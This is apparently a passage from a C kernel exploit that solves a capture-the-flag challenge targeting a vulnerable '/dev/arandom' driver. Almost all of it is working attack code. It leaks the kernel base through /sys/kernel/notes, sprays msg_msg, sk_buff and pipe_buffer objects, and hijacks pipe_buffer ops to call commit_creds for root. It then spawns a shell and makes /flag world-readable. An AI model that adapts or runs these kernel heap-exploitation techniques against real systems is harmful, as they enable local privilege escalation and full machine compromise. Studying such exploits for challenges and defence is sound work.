"movq %1, %%rsi;"
"movq $0x20, %%rdx;"
"movq $1, %%rax;"
"syscall;" ::"r"(fd),
"r"(buffer));
}

/*
* read /sys/kernel/notes for passing kaslr
*/
uint64_t leak_from_notes() {
int fd_leak = open("/sys/kernel/notes", 0);
char leak[0x100] = {0};
read(fd_leak, leak, 0x100);
uint64_t base = *(uint64_t *)(&leak[0x9c]) - 0x2000;
success("leaking address: %#lx", base);
return base;
}

void get_flag() {
system("echo -ne '#!/bin/sh\n/bin/chmod 777 /flag' > /tmp/x");
system("chmod +x /tmp/x");
system("echo -ne '\\xff\\xff\\xff\\xff' > /tmp/dummy");
system("chmod +x /tmp/dummy");
system("/tmp/dummy");
usleep(3000);
system("cat /flag");
pause();
exit(0);
}

void get_flag2() {
execve("/tmp/dummy", NULL, NULL);
int fd_flag = open("/flag", 2);
char buf[0x50] = {0};
read(fd_flag, buf, 0x50);
write(1, buf, 0x50);
pause();
exit(0);
}

void free_pipe(int flides[2]) {
close(flides[0]);
close(flides[1]);
}

void __attribute__((constructor)) init() {
bind_cpu(0);
page_size = sysconf(_SC_PAGESIZE);
}

struct arandom_params // sizeof=0xC
{ // XREF: random_info/r
uint32_t rand_size; // XREF: arandom_ioctl+BF/r
uint32_t rand_offset;
uint32_t rand_value;
} AAA;

static void adjust_rlimit() {
struct rlimit rlim;
/*
rlim.rlim_cur = rlim.rlim_max = (200 << 20);
setrlimit(RLIMIT_AS, &rlim);
rlim.rlim_cur = rlim.rlim_max = 32 << 20;
setrlimit(RLIMIT_MEMLOCK, &rlim);
rlim.rlim_cur = rlim.rlim_max = 136 << 20;
// setrlimit(RLIMIT_FSIZE, &rlim);
rlim.rlim_cur = rlim.rlim_max = 1 << 20;
setrlimit(RLIMIT_STACK, &rlim);
rlim.rlim_cur = rlim.rlim_max = 0;
setrlimit(RLIMIT_CORE, &rlim);
*/
// RLIMIT_FILE
rlim.rlim_cur = rlim.rlim_max = 14096;
if (setrlimit(RLIMIT_NOFILE, &rlim) < 0) {
rlim.rlim_cur = rlim.rlim_max = 4096;
if (setrlimit(RLIMIT_NOFILE, &rlim) < 0) {
perror("setrlimit");
err_exit("setrlimit");
}
}
}

void pre_spray() {
#define PRE_MSG_NUM 56
int pre_ms_qid[PRE_MSG_NUM];
char *pre_msg_buf = (char *)malloc(0x1000);
char *pre_msg_recv = (char *)malloc(0x1000);

for (int i = 0; i < PRE_MSG_NUM; ++i) {
pre_ms_qid[i] = get_msg_queue();
memset(pre_msg_buf, (char)i, 0x1000);
check(write_msg(pre_ms_qid[i], pre_msg_buf, 0x1000 - 0x30, 1));
}
success("pre spray msg_msg successfully\n");

for (int i = 0; i < PRE_MSG_NUM - 8; i += 8) {
check(read_msg(pre_ms_qid[i], pre_msg_recv, 0x1000 - 0x30, 1));
}
info("free some objs\n");

for (int i = PRE_MSG_NUM - 7; i < PRE_MSG_NUM; ++i) {
check(read_msg(pre_ms_qid[i], pre_msg_recv, 0x1000 - 0x30, 1));
}
info("free before 8 objs\n");
}

void spray_pipe() {
const uint64_t pipe_num = 0x100;
const uint64_t pipe_buf_size = page_size;

char *pipe_buf = malloc(pipe_buf_size);
int pipe_fd[pipe_num][2];
// anon_pipe_buf_ops
for (int i = 0; i < pipe_num; ++i) {
check(pipe(pipe_fd[i]));
memset(pipe_buf, i, pipe_buf_size);
memcpy(pipe_buf, "find__me", 0x8);
for (int j = 0; j < 0x1; ++j) {
check(write(pipe_fd[i][1], pipe_buf, pipe_buf_size));
}
check(fcntl(pipe_fd[i][1], F_SETPIPE_SZ, 0x1000 * 64));
check(write(pipe_fd[i][1], pipe_buf, 0x1000));
}
}

void spray_seq() {
const uint64_t seq_file_num = 0xc00;

int seq_fd[seq_file_num];

for (int i = 0; i < seq_file_num; ++i) {
seq_fd[i] = check(open("/proc/self/stat", 0));
}
success("spray seq_op successfully\n");

check(ioctl(fd, 0x1003)); // write
info("write buffer+%#x <- %#x\n", AAA.rand_offset, AAA.rand_value);
}

// NOTE: Linux v6.11 add msg_msg-xx kmalloc cache and only affects the first
// page, which means we can't use it to perform heap spray :(
// Pwned :)
// Success rate: approximately 1/40
int main() {
// ioctl: 0x1001: alloc 0x1002: free
// 0x1003:
// *(_DWORD *)((char *)buffer + rand_offset) = AAA.rand_value;
// 0x1004:
// copy_to_user AAA
// 0x1005:
// if ( *(_QWORD *)((char *)buffer + v4) == AAA.rand_value
//&& v4 == *(_QWORD *)((char *)buffer + v4 + 16)
//&& *(_QWORD *)((char *)buffer + v4 + 24) == AAA.rand_size )
//{
//*(_QWORD *)((char *)buffer + v4 + 32) = &get_random_bytes;
//}
//

save_stat();
adjust_rlimit();

info("page size: %#lx\n", page_size);

// INFO: Step 0x01: open device
step("open device");

fd = check(open("/dev/arandom", 2));
success("device open successfully\n");

ioctl(fd, 0x1004, &AAA);
info("arandom rand_size: %#x\n", AAA.rand_size);
info("arandom rand_offset: %#x\n", AAA.rand_offset);
info("arandom rand_value: %#x\n", AAA.rand_value);

ioctl(fd, 0x1001); // alloc
info("alloc buffer size: %#x\n", AAA.rand_size);

check(ioctl(fd, 0x1002)); // free
info("free buffer successfully\n");

uint32_t offset = AAA.rand_offset & 0xfff;
info("page offset: %#x\n", offset);

// INFO: Step 0x02: spray sk_buff
step("spray sk_buff");
#define SOCKET_NUM 8
#define SK_BUFF_NUM 10
const uint64_t skb_reserve_size = 320;
const uint64_t skb_size = page_size - skb_reserve_size;

int sk_sockets[SOCKET_NUM][2];
char *skb_buf = (char *)malloc(0x1000);

for (int i = 0; i < SOCKET_NUM; i++) {
check(socketpair(AF_UNIX, SOCK_STREAM, 0, sk_sockets[i]));
memset(skb_buf, (char)i, skb_size);
memcpy(skb_buf, "hamoood", 0x8);
memset(skb_buf + offset, 0, 0x20);
memcpy(skb_buf + offset, &AAA.rand_value, 0x4);
memcpy(skb_buf + offset + 0x10, &AAA.rand_offset, 0x4);
memcpy(skb_buf + offset + 0x18, &AAA.rand_size, 0x4);

for (int j = 0; j < SK_BUFF_NUM; ++j) {
check(write(sk_sockets[i][0], skb_buf, skb_size));
}
}
success("spray sk_buff successfully\n");

// INFO: Step 0x03: check & read sk_buff
step("check & read sk_buff");
char *skb_recv = (char *)malloc(0x1000);

check(ioctl(fd, 0x1005)); // check
info("check buffer\n");

info("read sk_buff length %#x\n", offset);

for (int i = 0; i < SOCKET_NUM; i++) {
for (int j = 0; j < SK_BUFF_NUM; ++j) {
check(read(sk_sockets[i][1], skb_recv, skb_size));

uint64_t possible_addr = *(uint64_t *)(skb_recv + offset + 0x20);
if ((possible_addr & 0xffffffff00000000) == 0xffffffff00000000) {
success("find kernel addr at No.%d: %#lx\n", i,
*(uint64_t *)(skb_recv + offset + 0x20));
kernel_base = possible_addr - calc(0xffffffff81907850);
success("find kernel base: %#lx\n", kernel_base);
goto FIND;
}
}
}
if (kernel_base == 0) {
err_exit("not found");
}

FIND:
// INFO: Step 0x04: spray pipe_buffer
step("spray pipe_buffer");

struct pipe_buffer {
void *page;
unsigned int offset, len;
void *ops;
unsigned int flags;
unsigned long private;
} pipe_example;

pipe_example.page = (void *)0xffffea0000000000;
pipe_example.len = 0x1000;
pipe_example.offset = 0x0;
pipe_example.ops = (void *)calc(0xffffffff8222bb80);
pipe_example.ops = NULL;
pipe_example.flags = 0x10;
pipe_example.private = 0x0;

const size_t pipe_buffer_size = sizeof(struct pipe_buffer);

info("pipe_buffer size: %#lx\n", pipe_buffer_size);

const uint64_t pipe_num = 0x10;
const uint64_t pipe_buf_size = page_size;

uint32_t inner_pipe_offset = offset % pipe_buffer_size;

char *pipe_buf = malloc(pipe_buf_size);
int pipe_fd[pipe_num][2];
// anon_pipe_buf_ops
for (int i = 0; i < pipe_num; ++i) {
check(pipe(pipe_fd[i]));
memset(pipe_buf, i, pipe_buf_size);
memcpy(pipe_buf, "find__me", 0x8);
check(write(pipe_fd[i][1], pipe_buf, pipe_buf_size));
check(fcntl(pipe_fd[i][1], F_SETPIPE_SZ, 0x1000 * 64));

for (int j = 0; j < 0x1; ++j) {
memset(pipe_buf + 0x8, j, 0x8);
check(write(pipe_fd[i][1], pipe_buf, 0x1000));
}
}
success("spray pipe_buffer successfully\n");

// INFO: Step 0x05: write random value
step("write random value");

info("inner pipe offset: %#x\n", inner_pipe_offset);
info("before writting:\n");
dump_hex((char *)&pipe_example, 0x28);

memcpy((char *)(&pipe_example) + inner_pipe_offset, &AAA.rand_value, 0x4);

check(ioctl(fd, 0x1003)); // write
info("write buffer+%#x <- %#x\n", AAA.rand_offset, AAA.rand_value);

info("after writting:\n");
dump_hex((char *)&pipe_example, 0x28);

void *fake_ops = pipe_example.ops;
void *fake_ops_page = (void *)((uint64_t)fake_ops & 0xFFFFFFFFFffff000);
uint32_t fake_ops_page_offset = ((uint64_t)fake_ops & 0xfff);

if (pipe_example.ops == NULL) {
err_exit("Useless write");
}

success("affect pipe_buffer's ops successfully\n");
success("pipe_buffer's ops: %p\n", pipe_example.ops);

info("mmap page %p\n", fake_ops_page);
void *mmap_page = mmap(fake_ops_page, 0x3000, PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);

if (mmap_page != fake_ops_page) {
err_exit("mmap error");
}

// INFO: Step 0x06: close pipes
step("close pipes");

// ffffffff812c8d40 T commit_creds
// ffffffff812c8fd0 T prepare_kernel_cred
commit_creds = (void *)calc(0xffffffff812c8d40);
prepare_kernel_cred = (void *)calc(0xffffffff812c8fd0);
init_cred = (void *)calc(0xffffffff82a54120);

uint64_t win_addr = (uint64_t)win;
info("win address: %#lx\n", win_addr);

for (int i = 0; i < 0x80; ++i) {
memcpy(fake_ops + i * 8, &win_addr, 0x8);
}

for (int i = 0; i < pipe_num; ++i) {
check(close(pipe_fd[i][0]));
check(close(pipe_fd[i][1]));
}

shell();

/*
*
0xffffffff8170540b <load_msg+59> call 0xffffffff81501210
<__kmalloc_node_noprof>
rdi: 0xa00
rsi: 0xffff8880044512a0 <- 0
rdx: 0xcc0
rcx: 0xffffffff
*
*/

return 0;
}